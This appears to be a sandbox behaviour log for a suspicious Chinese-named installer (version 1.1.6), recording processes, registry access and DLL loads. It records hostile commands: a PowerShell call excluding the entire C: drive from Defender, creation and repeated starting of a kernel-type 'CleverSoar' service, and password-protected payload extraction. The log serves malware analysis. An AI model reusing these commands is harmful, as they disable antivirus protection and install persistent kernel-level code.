Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeVirustotal: Detection: 11%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
